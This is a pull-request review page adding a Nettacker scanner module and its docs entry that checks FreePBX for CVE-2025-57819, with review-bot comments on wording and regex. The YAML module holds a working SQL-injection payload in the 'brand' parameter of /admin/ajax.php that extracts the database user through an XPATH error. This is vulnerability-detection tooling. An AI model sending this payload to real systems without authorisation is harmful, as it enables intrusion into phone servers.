1 change: 1 addition & 0 deletions docs/Modules.md
Expand Up @@ -161,6 +161,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
- '**ProFTPd_integer_overflow_vuln**' - check ProFTPd for CVE-2011-1137
- '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
- '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
- '**sangoma_freepbx_cve_2025_57819_vuln**' - check target for CVE-2025-57819
- '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
- '**smartermail_cve_2026_24423_vuln**' - check the target for SmarterMail CVE-2026-24423 vulnerability
- '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability
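Review bot: The new `sangoma_freepbx_cve_2025_57819_vuln` entry reads only "check target for CVE-2025-57819", while the neighbouring entries name the affected product (for example "check the target for SmarterMail CVE-2026-24423 vulnerability"). Suggest naming FreePBX in the description, e.g. "check the target for Sangoma FreePBX CVE-2025-57819 vulnerability", so the module list stays searchable by product and consistent in wording.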
50 changes: 50 additions & 0 deletions nettacker/modules/vuln/sangoma_freepbx_cve_2025_57819.yaml
@@ -0,0 +1,50 @@
info:
name: sangoma_freepbx_cve_2025_57819_vuln
author: Sankalp Bansal
severity: 9.8
description: >
CVE-2025-57819 is a critical vulnerability in FreePBX 15, 16, 17.
Improper sanitization in the brand parameter of the endpoint
module leads to SQLi and Remote Code Execution possibly leading
to root privileges.
reference:
- https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/
- https://nvd.nist.gov/vuln/detail/CVE-2025-57819
- https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819/blob/main/README.md
profiles:
- vuln
- http
- critical_severity
- cve
- cve_2025
- sangoma
- freepbx
- cisa_kev

payloads:
- library: http
steps:
- method: get
timeout: 3
headers:
User-Agent: "{ user_agent }"
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x' AND EXTRACTVALUE(1,CONCAT('~USER:',(SELECT USER()),'~')) -- "
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
- "https"
ports:
- 80
- 443
response:
condition_type: and
conditions:
content:
regex: (?s)(?=.*XPATH syntax error.*~.*~)(?=.*utility\.functions\.php)(?=.*~USER:([^~]+)~)
reverse: false
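Review bot: In the `regex` under `response.conditions.content`, the lookahead `(?=.*utility\.functions\.php)` makes a positive result depend on that file name appearing in the response body, so a target that returns the `XPATH syntax error` text and the `~USER:...~` marker without a file path would be reported as not vulnerable. Consider whether that lookahead is needed, given that the error string plus the marker is already specific; the `~.*~` part of the first lookahead also repeats what the third lookahead checks, and the capture group `([^~]+)` is not used by anything visible here. Separately, `input_format` percent-encodes the backslashes as `%5C` but leaves the spaces and the quote in the `brand` value raw, including a trailing space at the end of the string; encoding the whole query value would make the request independent of how the HTTP library normalises the URL.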